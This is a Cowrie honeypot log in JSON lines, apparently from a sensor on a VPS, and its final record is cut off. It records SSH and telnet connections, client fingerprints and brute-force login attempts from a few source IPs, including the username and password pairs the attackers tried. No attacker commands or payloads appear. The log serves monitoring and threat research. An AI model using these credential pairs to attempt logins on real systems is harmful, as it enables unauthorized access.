{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T01:53:09.131795Z","src_ip":"212.227.235.229","session":"91fe48ae1740"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T01:53:09.329053Z","src_ip":"212.227.235.229","session":"eb724044c279"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-09-09T01:53:09.896472Z","src_ip":"212.227.235.229","session":"c525d8b5bb09"}
{"eventid":"cowrie.login.failed","username":"elasticsearch","password":"elasticsearch@123","message":"login attempt [elasticsearch/elasticsearch@123] failed","sensor":"my-vps","timestamp":"2025-09-09T01:53:10.254025Z","src_ip":"212.227.235.229","session":"91fe48ae1740"}
{"eventid":"cowrie.login.failed","username":"administrator","password":"!","message":"login attempt [administrator/!] failed","sensor":"my-vps","timestamp":"2025-09-09T01:53:10.277990Z","src_ip":"212.227.235.229","session":"eb724044c279"}
{"eventid":"cowrie.session.closed","duration":"2.6","message":"Connection lost after 2.6 seconds","sensor":"my-vps","timestamp":"2025-09-09T01:53:11.164759Z","src_ip":"212.227.235.229","session":"c525d8b5bb09"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":50864,"dst_ip":"1.2.3.4","dst_port":22,"session":"313f6afdaf36","protocol":"ssh","message":"New connection: 212.227.235.229:50864 (1.2.3.4:22) [session: 313f6afdaf36]","sensor":"my-vps","timestamp":"2025-09-09T01:53:11.427033Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T01:53:11.427835Z","src_ip":"212.227.235.229","session":"313f6afdaf36"}
{"eventid":"cowrie.session.closed","duration":"2.4","message":"Connection lost after 2.4 seconds","sensor":"my-vps","timestamp":"2025-09-09T01:53:11.518112Z","src_ip":"212.227.235.229","session":"eb724044c279"}
{"eventid":"cowrie.session.closed","duration":"2.7","message":"Connection lost after 2.7 seconds","sensor":"my-vps","timestamp":"2025-09-09T01:53:11.524704Z","src_ip":"212.227.235.229","session":"91fe48ae1740"}
{"eventid":"cowrie.session.connect","src_ip":"139.19.117.131","src_port":60380,"dst_ip":"1.2.3.4","dst_port":22,"session":"ad94fd89775a","protocol":"ssh","message":"New connection: 139.19.117.131:60380 (1.2.3.4:22) [session: ad94fd89775a]","sensor":"my-vps","timestamp":"2025-09-09T01:53:11.639121Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-09-09T01:53:11.639865Z","src_ip":"139.19.117.131","session":"ad94fd89775a"}
{"eventid":"cowrie.client.kex","hassh":"f1e5e9d24e5e345e8745613bde22d532","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,diffie-hellman-group-exchange-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,diffie-hellman-group-exchange-sha256;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128,arcfour,aes128-cbc,3des-cbc,aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128,arcfour,aes128-cbc,3des-cbc;hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","diffie-hellman-group-exchange-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","diffie-hellman-group-exchange-sha256"],"keyAlgs":["ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128","arcfour","aes128-cbc","3des-cbc","aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128","arcfour","aes128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: f1e5e9d24e5e345e8745613bde22d532","sensor":"my-vps","timestamp":"2025-09-09T01:53:11.656766Z","src_ip":"139.19.117.131","session":"ad94fd89775a"}
{"eventid":"cowrie.client.fingerprint","username":"admin","fingerprint":"24:0d:13:f1:d9:62:5d:a0:b5:bb:06:43:55:5b:4b:23","key":"ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQC6N8NEl5/tfuun0UMyKXdJEy/97yksjoPyI9ovBT4KxNor00WgfWkRT0JNFEhFsfiHo3eolE76FDGRVzuCUc7rIbj1vTINdb/GPa+5zXvaJGfhetyB0PjNJxbFWIytYo01jwHTq1eyVPn+uULreYB5ArBJjRmrY8NkOkGPynebgk6qU7oDFqeVzSulk9z9tZSTLiMEs66YGCFCCPlWsa/xCIdgaGwUOG+hz5WfaZDzbeKRdx5xIo2FX5/hET/tg78WL7YDJfswot/cqNwvtp94JtW1stkewAazxqXRwjLsR5rADOMn5/0nyhifx1kh7af/KtVaME+nUQlfgk3dVNjx","type":"ssh-rsa","message":"public key attempt for user admin of type ssh-rsa with fingerprint 24:0d:13:f1:d9:62:5d:a0:b5:bb:06:43:55:5b:4b:23","sensor":"my-vps","timestamp":"2025-09-09T01:53:11.691667Z","src_ip":"139.19.117.131","session":"ad94fd89775a"}
{"eventid":"cowrie.login.failed","username":"admin","fingerprint":"24:0d:13:f1:d9:62:5d:a0:b5:bb:06:43:55:5b:4b:23","key":"ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQC6N8NEl5/tfuun0UMyKXdJEy/97yksjoPyI9ovBT4KxNor00WgfWkRT0JNFEhFsfiHo3eolE76FDGRVzuCUc7rIbj1vTINdb/GPa+5zXvaJGfhetyB0PjNJxbFWIytYo01jwHTq1eyVPn+uULreYB5ArBJjRmrY8NkOkGPynebgk6qU7oDFqeVzSulk9z9tZSTLiMEs66YGCFCCPlWsa/xCIdgaGwUOG+hz5WfaZDzbeKRdx5xIo2FX5/hET/tg78WL7YDJfswot/cqNwvtp94JtW1stkewAazxqXRwjLsR5rADOMn5/0nyhifx1kh7af/KtVaME+nUQlfgk3dVNjx","type":"ssh-rsa","message":"public key login attempt for [admin] failed","sensor":"my-vps","timestamp":"2025-09-09T01:53:11.692248Z","src_ip":"139.19.117.131","session":"ad94fd89775a"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T01:53:11.693918Z","src_ip":"212.227.235.229","session":"313f6afdaf36"}
{"eventid":"cowrie.client.fingerprint","username":"admin","fingerprint":"24:0d:13:f1:d9:62:5d:a0:b5:bb:06:43:55:5b:4b:23","key":"ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQC6N8NEl5/tfuun0UMyKXdJEy/97yksjoPyI9ovBT4KxNor00WgfWkRT0JNFEhFsfiHo3eolE76FDGRVzuCUc7rIbj1vTINdb/GPa+5zXvaJGfhetyB0PjNJxbFWIytYo01jwHTq1eyVPn+uULreYB5ArBJjRmrY8NkOkGPynebgk6qU7oDFqeVzSulk9z9tZSTLiMEs66YGCFCCPlWsa/xCIdgaGwUOG+hz5WfaZDzbeKRdx5xIo2FX5/hET/tg78WL7YDJfswot/cqNwvtp94JtW1stkewAazxqXRwjLsR5rADOMn5/0nyhifx1kh7af/KtVaME+nUQlfgk3dVNjx","type":"ssh-rsa","message":"public key attempt for user admin of type ssh-rsa with fingerprint 24:0d:13:f1:d9:62:5d:a0:b5:bb:06:43:55:5b:4b:23","sensor":"my-vps","timestamp":"2025-09-09T01:53:11.710273Z","src_ip":"139.19.117.131","session":"ad94fd89775a"}
{"eventid":"cowrie.login.failed","username":"admin","fingerprint":"24:0d:13:f1:d9:62:5d:a0:b5:bb:06:43:55:5b:4b:23","key":"ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQC6N8NEl5/tfuun0UMyKXdJEy/97yksjoPyI9ovBT4KxNor00WgfWkRT0JNFEhFsfiHo3eolE76FDGRVzuCUc7rIbj1vTINdb/GPa+5zXvaJGfhetyB0PjNJxbFWIytYo01jwHTq1eyVPn+uULreYB5ArBJjRmrY8NkOkGPynebgk6qU7oDFqeVzSulk9z9tZSTLiMEs66YGCFCCPlWsa/xCIdgaGwUOG+hz5WfaZDzbeKRdx5xIo2FX5/hET/tg78WL7YDJfswot/cqNwvtp94JtW1stkewAazxqXRwjLsR5rADOMn5/0nyhifx1kh7af/KtVaME+nUQlfgk3dVNjx","type":"ssh-rsa","message":"public key login attempt for [admin] failed","sensor":"my-vps","timestamp":"2025-09-09T01:53:11.710866Z","src_ip":"139.19.117.131","session":"ad94fd89775a"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-09-09T01:53:12.793165Z","src_ip":"212.227.235.229","session":"313f6afdaf36"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":57021,"dst_ip":"1.2.3.4","dst_port":23,"session":"151c18f95df6","protocol":"telnet","message":"New connection: 212.227.125.160:57021 (1.2.3.4:23) [session: 151c18f95df6]","sensor":"my-vps","timestamp":"2025-09-09T01:53:13.027567Z"}
{"eventid":"cowrie.session.closed","duration":"7.8","message":"Connection lost after 7.8 seconds","sensor":"my-vps","timestamp":"2025-09-09T01:53:13.052095Z","src_ip":"212.227.235.229","session":"8a53a63f848d"}
{"eventid":"cowrie.session.closed","duration":"1.6","message":"Connection lost after 1.6 seconds","sensor":"my-vps","timestamp":"2025-09-09T01:53:13.058624Z","src_ip":"212.227.235.229","session":"313f6afdaf36"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":46774,"dst_ip":"1.2.3.4","dst_port":22,"session":"cf2310e2b0ba","protocol":"ssh","message":"New connection: 212.227.235.229:46774 (1.2.3.4:22) [session: cf2310e2b0ba]","sensor":"my-vps","timestamp":"2025-09-09T01:53:16.181036Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T01:53:16.182018Z","src_ip":"212.227.235.229","session":"cf2310e2b0ba"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":52392,"dst_ip":"1.2.3.4","dst_port":22,"session":"55cf553562fa","protocol":"ssh","message":"New connection: 212.227.235.229:52392 (1.2.3.4:22) [session: 55cf553562fa]","sensor":"my-vps","timestamp":"2025-09-09T01:53:16.344684Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T01:53:16.345462Z","src_ip":"212.227.235.229","session":"55cf553562fa"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T01:53:16.433804Z","src_ip":"212.227.235.229","session":"cf2310e2b0ba"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T01:53:16.569302Z","src_ip":"212.227.235.229","session":"55cf553562fa"}
{"eventid":"cowrie.login.failed","username":"builder","password":"builder.123","message":"login attempt [builder/builder.123] failed","sensor":"my-vps","timestamp":"2025-09-09T01:53:17.482520Z","src_ip":"212.227.235.229","session":"cf2310e2b0ba"}
{"eventid":"cowrie.login.failed","username":"anonymous","password":"12345678","message":"login attempt [anonymous/12345678] failed","sensor":"my-vps","timestamp":"2025-09-09T01:53:17.503953Z","src_ip":"212.227.235.229","session":"55cf553562fa"}
{"eventid":"cowrie.session.closed","duration":"2.4","message":"Connection lost after 2.4 seconds","sensor":"my-vps","timestamp":"2025-09-09T01:53:18.728995Z","src_ip":"212.227.235.229","session":"55cf553562fa"}
{"eventid":"cowrie.session.closed","duration":"2.6","message":"Connection lost after 2.6 seconds","sensor":"my-vps","timestamp":"2025-09-09T01:53:18.737600Z","src_ip":"212.227.235.229","session":"cf2310e2b0ba"}
{"eventid":"cowrie.session.closed","duration":"10.0","message":"Connection lost after 10.0 seconds","sensor":"my-vps","timestamp":"2025-09-09T01:53:21.639414Z","src_ip":"139.19.117.131","session":"ad94fd89775a"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":33072,"dst_ip":"1.2.3.4","dst_port":22,"session":"a24c019df9e0","protocol":"ssh","message":"New connection: 212.227.235.229:33072 (1.2.3.4:22) [session: a24c019df9e0]","sensor":"my-vps","timestamp":"2025-09-09T01:53:43.022134Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T01:53:44.636614Z","src_ip":"212.227.235.229","session":"a24c019df9e0"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T01:53:44.637428Z","src_ip":"212.227.235.229","session":"a24c019df9e0"}
{"eventid":"cowrie.session.closed","duration":32.237547159194946,"message":"Connection lost after 32 seconds","sensor":"my-vps","timestamp":"2025-09-09T01:53:45.265045Z","src_ip":"212.227.125.160","session":"151c18f95df6"}
{"eventid":"cowrie.login.failed","username":"user","password":"password123","message":"login attempt [user/password123] failed","sensor":"my-vps","timestamp":"2025-09-09T01:53:47.086317Z","src_ip":"212.227.235.229","session":"a24c019df9e0"}
{"eventid":"cowrie.session.closed","duration":"5.3","message":"Connection lost after 5.3 seconds","sensor":"my-vps","timestamp":"2025-09-09T01:53:48.336150Z","src_ip":"212.227.235.229","session":"a24c019df9e0"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":52444,"dst_ip":"1.2.3.4","dst_port":22,"session":"506315df3cef","protocol":"ssh","message":"New connection: 212.227.235.229:52444 (1.2.3.4:22) [session: 506315df3cef]","sensor":"my-vps","timestamp":"2025-09-09T01:54:06.254090Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T01:54:06.255008Z","src_ip":"212.227.235.229","session":"506315df3cef"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T01:54:06.484246Z","src_ip":"212.227.235.229","session":"506315df3cef"}
{"eventid":"cowrie.login.failed","username":"access","password":"P@ssw0rd","message":"login attempt [access/P@ssw0rd] failed","sensor":"my-vps","timestamp":"2025-09-09T01:54:07.444178Z","src_ip":"212.227.235.229","session":"506315df3cef"}
{"eventid":"cowrie.session.closed","duration":"2.4","message":"Connection lost after 2.4 seconds","sensor":"my-vps","timestamp":"2025-09-09T01:54:08.675426Z","src_ip":"212.227.235.229","session":"506315df3cef"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":49088,"dst_ip":"1.2.3.4","dst_port":22,"session":"dbeea0bdacc7","protocol":"ssh","message":"New connection: 212.227.235.229:49088 (1.2.3.4:22) [session: dbeea0bdacc7]","sensor":"my-vps","timestamp":"2025-09-09T01:54:18.216306Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T01:54:18.218731Z","src_ip":"212.227.235.229","session":"dbeea0bdacc7"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""